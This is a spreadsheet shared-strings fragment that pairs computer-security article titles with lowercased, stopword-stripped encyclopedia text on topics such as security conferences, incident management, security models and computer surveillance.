    <t>Relying party</t>
  </si>
  <si>
    <t>relying party (rp) computer term used refer server providing access secure software application. claims-based applications, claim statement entity makes order establish access, also called relying party (rp) applications. also called “claims aware applications” “claims-based applications”. applications services rps.with security token service (sts), redirects clients authenticates client issues security token containing claims client's identity, present instead application authenticating user directly, extract claims token identity related tasks.the openid standard defines situation whereby cooperating site allowing user multiple sites using credentials. user benefits share login credentials multiple sites, operators cooperating site avoid develop login mechanism.an application demonstrating concept relying party software running mobile devices, used granting user access software applications, also secure building access, without user enter credentials time. references</t>
  </si>
  <si>
    <t>Computer security conference</t>
  </si>
  <si>
    <t>computer security conference convention individuals involved computer security. they generally serve meeting places system network administrators, hackers, computer security experts. events common activities hacker conventions include: presentations keynote speakers panels. common topics include social engineering, lockpicking, penetration testing, hacking tools. hands-on activities competitions capture flag (ctf). "boot camps" offering training certification information technology. list general computer security conferences general security conferences might held non-profit/not-for-profit/for-profit professional associations, individuals informal group individuals, security product vendor companies. 44con infosec conference training event occurs annually london, acm-ccs (conferences computer communications security), security conference held since 1993. acsac, annual computer security applications conference oldest information security conference held annually. asia annual symposium information assurance serves academic track york state cyber security conference, annual information security conference held albany, usually days june targeted academic, government, industry participants. black hat, series conferences held annually different cities around world. black usa, held vegas immediately con, largest computer security events world. bluehat conference, twice year, invitation-only microsoft security conference aimed bringing microsoft security professionals external security researchers together. brucon, yearly conference, previously held brussels, since 2012 held ghent. lasting days, preceded training. cansecwest, vancouver held march hosts pwn2own hacking contest. international conference cryptography security system poland. conference series international conference cyber security aims bridge corporate need cyber security fancy world hacking. deepsec, vienna covers many security aspects computing electronic communications well security management social aspects. deepsec visited broad international audience, academics, researchers, vendors, finance, public administration etc. days trainings, days conference). presentations published vimeo youtube. con-is world's largest notable hacker conventions, held annually vegas, nevada. department defense cyber crime conference, annual conference focuses computer security needs united states federal government, military, defense contractors. fsec croatian annual security conference held faculty organization informatics varaždin. grehack.fr annual conference held grenoble. speakers academia, industry. both offensive defensive security. hack.lu, annual conference held luxembourg hacker halted, presented ec-council, objective global series hacker halted conferences raise international awareness towards increased education ethics security. hackinparis, annual event organized sysdream. program includes security, industrial espionage, penetration testing, physical security, social engineering, forensics, malware analysis techniques countermeasures. hack-it-n cybersecurity conference deals current issues offensive defensive techniques moment: hacking, cyber-espionage, cyber-surveillance etc. it's held bordeaux year organized tehtris enseirb-matmeca engineering school. hackito ergo sum, security conference pertaining research topics, attendees speakers industry, offensive side academic circles, held paris every april. hitbsecconf hack box, deep-knowledge security conference held malaysia netherlands. icissp international conference information systems security privacy, ieee symposium security privacy, top-tier privacy security conference. iia/isaca chicago hacking cybersecurity conference, regional, two-day event brings together executives professionals audit, risk management functions hear current trends first-hand knowledge subject matter experts. infowarcon beyond information warfare offensive cyber weapons technologies training congress. expo europe, held annually london's excel centre expo nordic, held annually stockholm's waterfront congress centre iwsecc international workshop security engineering cloud computing conjunction 14th international conference availability, reliability security (ares conference vienna, austria) leetcon, it-security-convention hannover (germany), frequently october november every year. talks it-security, iot, industry more. middle tennessee cyber conference annual two-day event covers cybersecurity trends, first-hand knowledge subject matter experts, operates attendees. ndss (network distributed system security symposium), annual security conference internet society. nspw (new security paradigms workshop), workshop ideas security. nullcon security conference annual security event held goa, india. open application security project (owasp), focuses application security. recon recon computer security conference focus reverse engineering advanced exploitation techniques. security conference, cryptography information security-related conference held annually francisco area. ruhrsec, annual non-profit security conference ruhr university bochum. s4:scada security scientific symposium, security conference pertaining scada held annually digital bond, usually miami. securit 2012, international conference security internet things held august amrita vishwa vidyapeetham. secureworld expo, series security conferences offering education, training opportunities, networking security leaders, experts, senior executives, policy makers shape face security. acm, international conference security information networks. source conference, source computer security conference boston, dublin seattle offers education business technical aspects security industry. sstic, annual french security symposium held rennes. swiss cyber storm, international security conference held october lucerne. troopers security conference, annual international security event workshops held heidelberg, germany. usenix security, annual security conference associated usenix. virus bulletin conference, annual security conference held late september early october since 1989. 0seccon zero security conference held kerala. positive hack days, annual international security event workshops held moscow, russia. ieee wifs workshop information forensics security conference hosted ieee signal processing society. hacker conferences hacker conference, also known hacker con, convention hackers. these serve meeting places phreakers, hackers, security professionals. actual events, time-spans, details various themes conventions depends specific convention attended also perceived reputation. typically actual details given convention couched mild secrecy legality certain panels, well willingness attendees explain enforcement less computer-savvy individuals (see hacker definition controversy). common topics include wardriving, lockpicking, corporate network security, personal rights freedoms, technologies, well general 'geek' motifs. some also contests general collaborative events hackathons. facet hacker conferences tends differentiate many "hackercons" general computer security conferences, evolution conference badge. while many conferences fairly standard paper/plastic badge identify attendees name, many hacker con's evolved non-traditional badges, electronic pcb's led's, screens, include wifi advanced, often hidden functionality, include games, identify individual, sometimes promoting group identity regional/local group affiliation. this spurred creation so-called "badgelife" different individuals organizations (such local hacker groups) design, create, sell otherwise distribute separate badge attendees wear addition conference badge. these badges purchased, earned completing challenge conference. rarest desirable badges defcon black badge. while badges traditionally associated defcon, spread conferences. list hacker conferences athcon, largest hacker conference south eastern europe taking place annually athens, greece. bsides, community conference initially started global. blackhoodie, series free, women-only reverse engineering conference offering workshops talks. they held different cities around world regular basis encourage women interested cyber security field. cactuscon, largest hacker cybersecurity conference arizona, held annually since 2012. carolinacon, annual information security rights conference held every spring north carolina's research triangle. chaos communication congress, oldest europe's largest hacker conference, held chaos computer club. conference series international conference cyber security aims bridge corporate need cyber security fancy world hacking. circlecitycon security technology conference held annually june indianapolis. con, unique cyber policing conference held across india every year indian cyber army. cyphercon, milwaukee based hacker conference held late winter year. con, vegas, nevada, biggest hacker convention united states held summer (june–august). derbycon, annual hacker conference based louisville, (2011-2019). diana initiative, annual hacker conference promote women cybersecurity technologies diana initiative profit located vegas, digital overdose con, europe based hacker tech conference focused rookies held spring year. ekoparty, hacker convention argentina important south america, held annually around september buenos aires. grrcon, annual hacker conference hosted september grand rapids, michigan. groundzero summit, annual hacker conference hosted november hotel ashoka, delhi. hack box, annual hacker conference. hackers hacking conferences india held frequently january–february every year. organizers also used organize defcon lucknow, dissolved defcon many controversies arose 2016. hackers hackers conference (h2hc) oldest security research (hacking) conference latin america oldest ones still active world. hackers idol, unique hackers cyber enthusiast talent hunt held across india every year indian cyber army. hackers next door, york city held tech learning collective winter (november/december). hackers planet earth (hope), york city held 2600: hacker quarterly mid-summer (july/august) every year. hackfest.ca, quebec, canada, bilingual conferences hacking games. hackers teaching hackers, hacker conference columbus, ohio, featuring talks, hands-on villages, ctf, mentorship, more. hackmiami conference, hacker conference miami, florida, organized hackmiami hackerspace. hacktivity, budapest, hungary, every september, largest hacker conference central eastern europe. hardwear.io hardware security conference annual hardware security event held hague, netherlands. organized every year answer emerging threats attacks hardware. infiltrate, hosted immunity, inc, deep technical security conference focuses offensive technical issues. conference held annually miami beach, florida since 2011. kernelcon, omaha, nebraska hacker convention held annually april, beginning 2019. kiwicon, wellington, zealand hacker convention. layerone, held every spring angeles, california. lehack, french hackers conference hosted paris malcon, world's first international malware conference, hosted india. international computer security conference held annually bergamo (it), considered largest technical security event italy. northsec, montreal, quebec, applied security event held yearly mid-may, featuring days conference followed on-site ctf. notacon, cleveland, ohio, technology conference held frequently mid-april. nuit hack, paris, france, oldest largest hacker conference held frequently late-june. phreaknic, nashville, tennessee, held nashville 2600. around october. pumpcon, yearly hackercon philadelphia, quahogcon, providence, rhode island held april. roadsec, biggest hacking conferences latin america, held brazil, smaller city editions throughout whole year, ending edition held paulo november (february november). rootcon, premier annual hacker conference philippines held annually summer (september october). rootedcon, madrid, spain, biggest hacker conference europe. this convention started 2010. (march) shellcon, angeles information security conference held annually beautiful beach cities angeles. shmoocon, washington, annual east coast hacker conference held washington, skydogcon, technology conference nashville, individual renaissance mind. skydogcon exists facilitate learning, information sharing, mingling like-minded people relaxed atmosphere. summercon, oldest hacker conventions, held summer (frequently june). helped precedent modern "cons" h.o.p.e. con. hackers conference, india's biggest cyber security conference held delhi, india every year. thotcon, chicago based hacker conference held spring year. toorcon, diego hacker convention emerged 2600 user group frequently late september. wildwesthackinfest, conference focused training development held deadwood, south dakota october. explore black hills learn hack things, including iot. zeroaccess, unique international cyber security conference held india, india month april indian cyber army sthack annual security conference bordeaux, followed traditional capture flag. non-annual hacker conventions stichting hal2001, not-for-profit organization, holds quadrennial dutch hacker convention. they have, far, held hal2001 (hackers large) what hack (2005, originally called (referring 16th anniversary event, well acronym hacking extreme)). dutch conferences held prior stichting hal2001's existence galactic hacker party (1989), hacking universe (1993) hacking progress (1997), notable held simultaneously conjunction beyond hope. not-for-profit organization 'stichting hxx' organizing 2009 incarnation con; (hacking random). during summer 2013 recent installment series, called (observe hack make), held. references external links hacker convention comparison based internet connectivity attendees infosec conferences list french non-commercial sycurity event 2019.</t>
  </si>
  <si>
    <t>Computer security incident management</t>
  </si>
  <si>
    <t>fields computer security information technology, computer security incident management involves monitoring detection security events computer computer network, execution proper responses events. computer security incident management specialized form incident management, primary purpose development well understood predictable response damaging events computer intrusions.incident management requires process response team follows process. this definition computer security incident management follows standards definitions described national incident management system (nims). incident coordinator manages response emergency security incident. natural disaster event requiring response emergency services, incident coordinator would liaison emergency services incident manager. overview computer security incident management administrative function managing protecting computer assets, networks information systems. these systems continue become critical personal economic welfare society. organizations (public private sector groups, associations enterprises) must understand responsibilities public good welfare memberships stakeholders. this responsibility extends management program “what things wrong.” incident management program defines implements process organization adopt promote welfare security public. components incident events event observable change normal behavior system, environment, process, workflow person (components). there three basic types events: normal—a normal event affect critical components require change controls prior implementation resolution. normal events require participation senior personnel management notification event. escalation escalated event affects critical production systems requires implementation resolution must follow change control process. escalated events require participation senior personnel stakeholder notification event. emergency emergency event impact health safety human beings breach primary controls critical systems materially affect component performance impact component systems prevent activities protect affect health safety individuals deemed emergency matter policy declaration available incident coordinatorcomputer security information technology personnel must handle emergency events according well-defined computer security incident response plan. incident incident event attributable human root cause. this distinction particularly important event product malicious intent harm. important note: incidents events many events incidents. system application failure defect emergency event random flaw failure incident. incident response team security incident coordinator manages response process responsible assembling team. coordinator ensure team includes individuals necessary properly assess incident make decisions regarding proper course action. incident team meets regularly review status reports authorize specific remedies. team utilize pre-allocated physical virtual meeting place. incident investigation investigation seeks determine circumstances incident. every incident warrant require investigation. however, investigation resources like forensic tools, dirty networks, quarantine networks consultation enforcement useful effective rapid resolution emergency incident. process initial incident management process employee, vendor, customer, partner, device sensor reports event help desk. prior creating ticket, help desk filter event false positive. otherwise, help desk system creates ticket captures event, event source, initial event severity event priority. ticket system creates unique event. personnel must ticket capture email, informal communication. subsequent activities like change control, incident management reports compliance reports must reference ticket number. instances event information “restricted access,” ticket must reference relevant documents secure document management system. first level responder captures additional event data performs preliminary analysis. many organizations volume events significant relative staff. result, automation applied, typically form soar (security orchestration, automation response) tool, integrated intelligence api. soar tool automates investigation workflow automation workbook. cyber intelligence enables playbook automate research related ticket (lookup potential phishing url, suspicious hash, etc.). first responder determines criticality event. level, either normal escalation event. normal events affect critical production systems require change controls prior implementation resolution. events affect critical production systems require change controls must escalated. organization management request immediate escalation without first level review tier create ticket. event ready resolve. resource enters resolution problem category ticket submits ticket closure. ticket owner (employee, vendor, customer partner) receives resolution. they determine problem resolved satisfaction escalate ticket. escalation report updated show event ticket assigned second tier resource investigate respond event. second tier resource performs additional analysis re-evaluates criticality ticket. when necessary, second tier resource responsible implementing change control notifying management event. emergency response: events follow escalation chain determined emergency response necessary. top-level organization management determine emergency response necessary invoke process directly. emergency response detail emergency response initiated escalation security event direct declaration executive organization staff. assign incident coordinator, default, coordinator senior security staff member available time incident. incident coordinator assembles incident response team. team meets using pre-defined conference meeting space. (cio, director must attend incident team meeting. meeting minutes capture status, actions resolution(s) incident. incident coordinator reports cost, exposure continuing business risk incident. incident response team determines next course action. lock-down repair perform actions necessary prevent damage organization, repair impacted systems perform changes prevent re-occurrence. false positive incident team determines issue warrant emergency response. team provides written report senior management issue handled either normal incident closed. monitor capture perform thorough investigation continued monitoring detect capture perpetrator. this process must include notification following senior professional staff: corporate attorney public relations review analyze data determine nature scope incident. this step include utilizing virus, spyware, rootkit detection tools determine necessary mitigation repair. repair systems, eliminate vector(s) attack, mitigate exploitable vulnerabilities. test report documents validation repair process. test systems ensure compliance policy risk mitigation. perform additional repairs resolve current vulnerabilities. investigate incident determine source attack capture perpetrator. this require forensics tools, analysis, clean dirty environments possible communication enforcement outside entities. “investigation status report” captures current information regarding incident. incident response team uses information determine next course action. (see definitions first responder/first level review first person scene receive notification event, organizations provide training first responder recognize properly react emergency circumstances. help desk ticket (control) electronic document captured database issue tracking/resolution system ticket owner person reporting event, principal owner assets associated event common jurisdictional owner. escalation report (control) first responder’s documentation ticket escalation, responder writes information ticket wiki event. ticket references wiki event. second tier senior technical resources assigned resolve escalated event. incident coordinator individual assigned organization senior management assemble incident response team, manage document response incident. investigation status report (control) documentation current investigation results, coordinator document material ticket, wiki engineer's journal. meeting minutes (control) documentation incident team meeting, minutes document attendees, current nature incident recommended actions. coordinator document material ticket, wiki engineer's journal. lock-down change control process ordered resolution incident. this process follows authorization response requirements emergency change control. test report (control) report validates personal performed necessary available repairs systems prior bringing back online. room secure environment review confidential material investigation security incident. report senior management (control) incident coordinator responsible drafting senior management report. coordinator document material ticket, wiki engineer's journalincident response steps detection incident detected sensor, network analyst user reporting something unusual his/her pc.containment event malicious network traffic computer virus, incident response manager stop traffic taking computer network.clean virus scan remove virus wipe computer clean reimage machine.reverse engineering computer forensics tools understand malicious traffic occurred first place. once incident completely understood make plans decrease future risk. also computer emergency response team proactive cyber defence united states' national incident management system references further reading handbook computer security incident response teams (csirts) http://www.sei.cmu.edu/library/abstracts/reports/03hb002.cfm</t>
  </si>
  <si>
    <t>Computer security model</t>
  </si>
  <si>
    <t>computer security model scheme specifying enforcing security policies. security model founded upon formal model access rights, model computation, model distributed computing, particular theoretical grounding all. computer security model implemented computer security policy. complete list available articles specific security models, category:computer security models. selected topics access control list (acl) attribute-based access control (abac) bell–lapadula model biba model brewer nash model capability-based security clark-wilson model context-based access control (cbac) graham-denning model harrison-ruzzo-ullman (hru) high-water mark (computer security) lattice-based access control (lbac) mandatory access control (mac) multi-level security (mls) non-interference (security) object-capability model protection ring role-based access control (rbac) take-grant protection model discretionary access control (dac) references krutz, ronald vines, russell dean, cissp prep guide; gold edition, wiley publishing, inc., indianapolis, indiana, 2003. cissp boot camp student guide, book (v.082807), vigilar, inc.</t>
  </si>
  <si>
    <t>Computer security policy</t>
  </si>
  <si>
    <t>computer security policy defines goals elements organization's computer systems. definition highly formal informal. security policies enforced organizational policies security mechanisms. technical implementation defines whether computer system secure insecure. these formal policy models categorized core security principles confidentiality, integrity, availability. example, bell-la padula model confidentiality policy model, whereas biba model integrity policy model. formal description system regarded finite-state automaton transitions (operations) change system's state, security policy seen statement partitions states authorized unauthorized ones. given simple definition, define secure system starts authorized state never enter unauthorized state. formal policy models confidentiality policy model bell-la padula model integrity policies model biba model clark-wilson model hybrid policy model chinese wall (also known brewer nash model) policy languages represent concrete policy, especially automated enforcement language representation needed. there exist application-specific languages closely coupled security mechanisms enforce policy application. compared abstract policy languages, e.g., domain type enforcement-language, independent concrete mechanism. also anti-virus information assurance triad firewall (computing) protection mechanisms separation protection security global cybersecurity agenda references bishop, matt (2004). computer security: science. addison-wesley.mclean, john (1994). "security models". encyclopedia software engineering. vol. york: john wiley sons, inc. 1136–1145. clark, d.d. wilson, d.r., 1987, april. comparison commercial military computer security policies. 1987 ieee symposium security privacy (pp. 184-184). ieee.</t>
  </si>
  <si>
    <t>Computer network operations</t>
  </si>
  <si>
    <t>computer network operations (cno) broad term military civilian application. conventional wisdom information power, information necessary make decisions digitized conveyed ever-expanding network computers electronic devices. computer network operations deliberate actions taken leverage optimize networks improve human endeavor enterprise warfare, gain information superiority deny enemy enabling capability. military domain within united states military domain, considered five core capabilities information operations (io) information warfare. capabilities psychological operations (psyop), military deception (mildec), operations security (opsec) electronic warfare (ew). other national military organizations different designations. computer network operations, concert electronic warfare (ew), used primarily disrupt, disable, degrade deceive enemy's command control, thereby crippling enemy's ability make effective timely decisions, simultaneously protecting preserving friendly command control. types military according joint 3-13, consists computer network attack (cna), computer network defense (cnd) computer network exploitation (cne). computer network attack (cna): includes actions taken computer networks disrupt, deny, degrade, destroy information within computers computer networks and/or computers/networks themselves. computer network defense (cnd): includes actions taken computer networks protect, monitor, analyze, detect respond network attacks, intrusions, disruptions unauthorized actions would compromise cripple defense information systems networks. joint outlines computer network defense aspect netops: computer network exploitation (cne): includes enabling actions intelligence collection computer networks exploit data gathered target enemy information systems networks. also cyberwarfare united states chinese information operations information warfare cyberwarfare russia references external links cyber, united states army combined arms center</t>
  </si>
  <si>
    <t>Computer security software</t>
  </si>
  <si>
    <t>computer security software cybersecurity software computer program designed influence information security. this often taken context defending computer systems data, incorporate programs designed specifically subverting computer systems significant overlap, adage best defense good offense. defense computers intrusion unauthorized resources called computer security. similarly, defense computer networks called network security. subversion computers unauthorized referred using terms cyberwarfare, cybercrime, security hacking (later shortened hacking references article issues hacker, hacker culture differences white/grey/black 'hat' color identification). types below, various software implementations cybersecurity patterns groups outlining ways host system attempts secure assets malicious interactions, includes tools deter passive active security threats. although security usability desired, today widely considered computer security software higher security comes decreased usability, higher usability comes decreased security. prevent access primary purpose types systems restrict often completely prevent access computers data except limited users. theory often key, credential, token unavailable access impossible. this often involves taking valuable information either reducing apparent noise hiding within another source information unrecoverable. cryptography encryption software steganography steganography toolsa critical tool used developing software prevents malicious access threat modeling. threat modeling process creating applying mock situations attacker could trying maliciously access data cyberspace. this, various profiles potential attackers created, including intentions, catalog potential vulnerabilities created respective organization real threat arises. threat modeling covers wide aspect cyberspace, including devices, applications, systems, networks, enterprises. cyber threat modeling inform organizations efforts pertaining cybersecurity following ways: risk management profiling current cybersecurity applications considerations future security implementations regulate access purpose types systems usually restrict access computers data still allowing interaction. often involves monitoring checking credential, separating systems access view based importance, quarantining isolating perceived dangers. physical comparison often made shield. form protection whose heavily dependent system owners preferences perceived threats. large numbers users allowed relatively low-level access limited security checks, significant opposition applied toward users attempting move toward critical areas. access control firewall sandbox monitor access purpose types software systems monitor access computers systems data reporting logging behavior. often composed large quantities priority data records logs, coupled high priority notices unusual suspicious behavior. diagnostic program intrusion detection system (ids) intrusion prevention system (ips) management software records management security information management security event management security information event management (siem) surveillance monitor these programs algorithms either stolen from, provided police military internet observation organizations provide equivalent police radio scanner. most systems born mass surveillance concepts internet traffic, cell phone communication, physical systems like cctv. global perspective related fields sigint elint approach geoint global information monitoring perspective. several instant messaging programs (founded "former" members unit 8200), wechat (rumored 3pla/4pla connections) represent extensions observation apparati. block remove malware purpose types software remove malicious harmful forms software compromise security computer system. these types software often closely linked software computer regulation monitoring. physical comparison doctor, scrubbing, cleaning ideas often made, usually "anti-" style naming scheme related particular threat type. threats unusual behavior identified system firewall intrusion detection system, following types software used remove them. these types software often require extensive research potential foes achieve complete success, similar complete eradication bacteria viral threats physical world. occasionally also represents defeating attackers encryption, case data tracing, hardened threat removal. anti-keyloggers anti-malware anti-spyware anti-subversion software anti-tamper software antivirus software also computer security data security emergency management software cloud workload protection platforms computer antivirus software references</t>
  </si>
  <si>
    <t>Computer surveillance in the workplace</t>
  </si>
  <si>
    <t>computer surveillance workplace computers monitor activity workplace. computer monitoring method collecting performance data employers obtain digitalised employee monitoring. computer surveillance nowadays used alongside traditional security applications, closed-circuit television. computer usage monitoring depending upon technology methods used, monitoring applications track activity target specific activities employees company-owned computer terminal. they monitor various devices installed computer (e.g., cameras microphones). this includes recordings devices also remote broadcasting live feed webcams microphones.tools used monitoring employee computer usage incorporate: screen monitoring records video static images detailing contents, screen capture, entire video display content screen activity within particular program computer application. monitoring tools collect real time video, accelerated time-lapse video screen shots, take video still image captures regular intervals (e.g., every minutes). they collect images constantly collect information user interacting equipment (e.g., capturing screens mouse keyboard active). data monitoring tracks content changes files stored local hard drive user's "private" network share. keystroke monitoring (e.g., number keystrokes minute) track performance keyboard-intensive work word processing data entry. keystroke logging captures keyboard input enable employer monitor anything typed monitored machine. idle time monitoring keeps track time employee away computer computer actively used. printer monitoring records documents files printed computer. removable drives monitoring tracks external devices connected computer. video/audio monitoring makes recordings snapshots connected devices webcam microphone broadcasts video/sound live.this also known employee monitoring industry. employee monitoring used multiple reasons, including compliance insider threat management. employee monitoring software monitor application software, including email, instant message, filesystem print jobs. internet usage internet surveillance monitoring internet data traffic, access, online activity. this include monitoring internet traffic including encrypted browser traffic transport layer security secure sockets layer connections, personal web-based email, personal banking sites. research done american management association nearly percent employers united states monitor employee e-mails. legislation labor union contracts forms employment agreements offer protection monitoring. additionally, united states, public sector employees protection fourth amendment united states constitution. employees california additional protection specific portions state statute.employers required maintain documentation emails communications regulatory compliance purposes. monitoring email instant messaging communications part requirements.some software used type surveillance impose additional restrictions notification requirements based user license agreement (eula). example, spectorsoft requires employees signed contract stating computer activity monitored employed. additional legal issues arise information obtained monitoring used illegal malicious purposes. employee perception organizations without stated computer usage monitoring policy, employees typically company's equipment respective discretion and, cases, visible restrictions monitoring activities performed computer. computer surveillance within employee discipline evaluation process viewed employees invasion privacy lack trust. employers right monitor employees united states course, specific rules regulations must follow depending state legislation.despite fact almost major companies america actively monitor employees., public opinion still mostly employees’ side. most americans still think monitoring workplace entirely acceptable. according research center, respondents care monitored work.employee's relationship employers affected monitored work. freedom, privacy, respect, responsibility aspect human relations taken away employee monitored. also surveillance spyware workplace privacy references</t>
  </si>
  <si>
    <t>Computer surveillance</t>
  </si>
  <si>
    <t>computer network surveillance monitoring computer activity data stored locally computer data transferred computer networks internet. this monitoring often carried covertly completed governments, corporations, criminal organizations, individuals. legal require authorization court independent government agencies. computer network surveillance programs widespread today almost internet traffic monitored.surveillance allows governments agencies maintain social control, recognize monitor threats suspicious abnormal activity, prevent investigate criminal activities. with advent programs total information awareness program, technologies high-speed surveillance computers biometrics software, laws communications assistance enforcement act, governments possess unprecedented ability monitor activities citizens.many civil rights privacy groups, reporters without borders, electronic frontier foundation, american civil liberties union, expressed concern increasing surveillance citizens result mass surveillance society, limited political and/or personal freedoms. such fear numerous lawsuits hepting at&amp;t. hacktivist group anonymous hacked government websites protest considers "draconian surveillance". network surveillance vast majority computer surveillance involves monitoring personal data traffic internet. example, united states, communications assistance enforcement mandates phone calls broadband internet traffic (emails, traffic, instant messaging, etc.) available unimpeded, real-time monitoring federal enforcement agencies.packet capture (also known "packet sniffing") monitoring data traffic network. data sent computers internet networks takes form small chunks called packets, routed destination assembled back complete message. packet capture appliance intercepts packets, examined analyzed. computer technology needed perform traffic analysis sift intercepted data look important/useful information. under communications assistance enforcement act, u.s. telecommunications providers required install packet capture technology federal enforcement intelligence agencies able intercept customers' broadband internet voice internet protocol (voip) traffic.there much data gathered packet sniffers human investigators manually search through. thus, automated internet surveillance computers sift vast amount intercepted internet traffic, filtering out, reporting investigators bits information "interesting", example, certain words phrases, visiting certain types sites, communicating email chat certain individual group. billions dollars year spent agencies information awareness office, nsa, fbi, development, purchase, implementation, operation systems intercept analyze data, extracting information useful enforcement intelligence agencies.similar systems used iranian security dept. identify suppress dissidents. technology allegedly installed german siemens finnish nokia.the internet's rapid development become primary form communication. more people potentially subject internet surveillance. there advantages disadvantages network monitoring. instance, systems described "web 2.0" greatly impacted modern society. reilly, first explained concept "web 2.0", stated provides communication platforms "user generated", self-produced content, motivating people communicate friends online. however, internet surveillance also disadvantage. researcher uppsala university said "web surveillance directed large user groups help hegemonically produce reproduce surveillance providing user-generated (self-produced) content. characterize surveillance mass self-surveillance". surveillance companies monitor people focused work entertainment. yet, employers also monitor employees. they order protect company's assets control public communications importantly, make sure employees actively working productive. this emotionally affect people; cause emotions like jealousy. research group states "...we test prediction feelings jealousy lead ‘creeping’ partner facebook, women particularly likely engage partner monitoring response jealousy". study shows women become jealous people online group. virtual assistant(ai) become social integration lives. currently, virtual assistants amazon's alexa apple's siri cannot call local services. they constantly listening command recording parts conversations help improve algorithms. enforcement able called using virtual assistant, enforcement would able access information saved device. device connected home's internet, enforcement would exact location individual calling enforcement. while virtual assistance devices popular, many debates lack privacy. devices listening every conversation owner having. even owner talking virtual assistant, device still listening conversation hopes owner need assistance, well gather data. corporate surveillance corporate surveillance computer activity common. data collected often used marketing purposes sold corporations, also regularly shared government agencies. used form business intelligence, enables corporation better tailor products and/or services desirable customers. data also sold corporations aforementioned purpose, used direct marketing purposes, targeted advertisements, targeted user search engine analyzing search history emails free webmail services), kept database.such type surveillance also used establish business purposes monitoring, include following: preventing misuse resources. companies discourage unproductive personal activities online shopping surfing company time. monitoring employee performance reduce unnecessary network traffic reduce consumption network bandwidth. promoting adherence policies. online surveillance means verifying employee observance company networking policies. preventing lawsuits. firms held liable discrimination employee harassment workplace. organizations also involved infringement suits employees distribute copyrighted material corporate networks. safeguarding records. federal legislation requires organizations protect personal information. monitoring determine extent compliance company policies programs overseeing information security. monitoring also deter unlawful appropriation personal information, potential spam viruses. safeguarding company assets. protection intellectual property, trade secrets, business strategies major concern. ease information transmission storage makes imperative monitor employee actions part broader policy.the second component prevention determining ownership technology resources. ownership firm's networks, servers, computers, files, e-mail explicitly stated. there distinction employee's personal electronic devices, limited proscribed, owned firm. instance, google search stores identifying information search. address search phrase used stored database months. google also scans content emails users gmail webmail service order create targeted advertising based people talking personal email correspondences. google far, largest internet advertising agency—millions sites place google's advertising banners links websites order earn money visitors click ads. each page containing google advertisements adds, reads, modifies "cookies" visitor's computer. these cookies track user across sites gather information surfing habits, keeping track sites visit, sites. this information, along information email accounts, search engine histories, stored google build profile user deliver better-targeted advertising.the united states government often gains access databases, either producing warrant simply asking. department homeland security openly stated uses data collected consumer credit direct marketing agencies augmenting profiles individuals monitoring. malicious software addition monitoring information sent computer network, also examine data stored computer's hard drive, monitor activities person using computer. surveillance program installed computer search contents hard drive suspicious data, monitor computer use, collect passwords, and/or report back activities real-time operator internet connection. keylogger example type program. normal keylogging programs store data local hard drive, programmed automatically transmit data network remote computer server. there multiple ways installing software. common remote installation, using backdoor created computer virus trojan. this tactic advantage potentially subjecting multiple computers surveillance. viruses often spread thousands millions computers, leave "backdoors" accessible network connection, enable intruder remotely install software execute commands. these viruses trojans sometimes developed government agencies, cipav magic lantern. more often, however, viruses created people spyware installed marketing agencies used gain access security breaches create.another method "cracking" computer gain access network. attacker install surveillance software remotely. servers computers permanent broadband connections vulnerable type attack. another source security cracking employees giving information users using brute force tactics guess password.one also physically place surveillance software computer gaining entry place computer stored install compact disc, floppy disk, thumbdrive. this method shares disadvantage hardware devices requires physical access computer. well-known worm uses method spreading stuxnet. social network analysis common form surveillance create maps social networks based data social networking sites well traffic analysis information phone call records call database, internet traffic data gathered calea. these social network "maps" data mined extract useful information personal interests, friendships affiliations, wants, beliefs, thoughts, activities.many u.s. government agencies defense advanced research projects agency (darpa), national security agency (nsa), department homeland security (dhs) currently investing heavily research involving social network analysis. intelligence community believes biggest threat u.s. comes decentralized, leaderless, geographically dispersed groups. these types threats easily countered finding important nodes network, removing them. requires detailed network.jason ethier northeastern university, study modern social network analysis, said following scalable social network analysis program developed information awareness office: purpose ssna algorithms program extend techniques social network analysis assist distinguishing potential terrorist cells legitimate groups people order successful ssna require information social interactions majority people around globe. since defense department cannot easily distinguish peaceful citizens terrorists, necessary gather data innocent civilians well potential terrorists. monitoring distance with commercially available equipment, shown possible monitor computers distance detecting radiation emitted monitor. this form computer surveillance, known tempest, involves reading electromagnetic emanations computing devices order extract data distances hundreds meters.ibm researchers also found that, computer keyboards, emits slightly different noise pressed. differences individually identifiable conditions, possible strokes without actually requiring logging software associated computer.in 2015, lawmakers california passed prohibiting investigative personnel state force businesses hand digital communication without warrant, calling electronic communications privacy act. time california, state senator jerry hill introduced bill making enforcement agencies disclose information usage information stingray phone tracker device. took effect january 2016, require cities operate guidelines relation enforcement device. some legislators holding public office disagreed technology warrantless tracking, city wants device, must heard public hearing. some cities pulled using stingray santa clara county. also shown, shamir al., even high frequency noise emitted includes information instructions executed. policeware govware german-speaking countries, spyware used made government sometimes called govware. some countries like switzerland germany legal framework governing software. known examples include swiss minipanzer megapanzer german r2d2 (trojan). policeware software designed police citizens monitoring discussion interaction citizens. within u.s., carnivore first incarnation secretly installed e-mail monitoring software installed internet service providers' networks computer communication, including transmitted e-mails. magic lantern another application, time running targeted computer trojan style performing keystroke logging. cipav, deployed fbi, multi-purpose spyware/trojan. clipper chip, formerly known myk-78, small hardware chip government install phones, designed nineties. intended secure private communication data reading voice messages encoded decode them. clipper chip designed clinton administration “…protect personal safety national security developing information anarchy fosters criminals, terrorists foreign foes.” government portrayed solution secret codes cryptographic keys technology created. thus, raised controversy public, clipper chip thought next “big brother” tool. this failure clipper proposal, even though many attempts push agenda.the "consumer broadband digital television promotion act" (cbdtpa) bill proposed united states congress. cbdtpa known "security systems standards certification act" (sssca) draft form killed committee 2002. cbdtpa become law, would prohibited technology could used read digital content copyright (such music, video, e-books) without digital rights management (drm) prevented access material without permission copyright holder. surveillance censorship surveillance censorship different. surveillance performed without censorship, harder engage censorship without forms surveillance. even surveillance lead directly censorship, widespread knowledge belief person, computer, internet surveillance lead self-censorship.in march 2013 reporters without borders issued special report internet surveillance examines technology monitors online activity intercepts electronic communication order arrest journalists, citizen-journalists, dissidents. report includes list "state enemies internet", bahrain, china, iran, syria, vietnam, countries whose governments involved active, intrusive surveillance news providers, resulting grave violations freedom information human rights. computer network surveillance increase countries. report also includes second list "corporate enemies internet", amesys (france), blue coat systems (u.s.), gamma germany), hacking team (italy), trovicor (germany), companies sell products liable used governments violate human rights freedom information. neither list exhaustive likely expanded future.protection sources longer matter journalistic ethics. journalists equip "digital survival kit" exchanging sensitive information online, storing computer hard-drive mobile phone. individuals associated high-profile rights organizations, dissident groups, protest groups, reform groups urged take extra precautions protect online identities. also 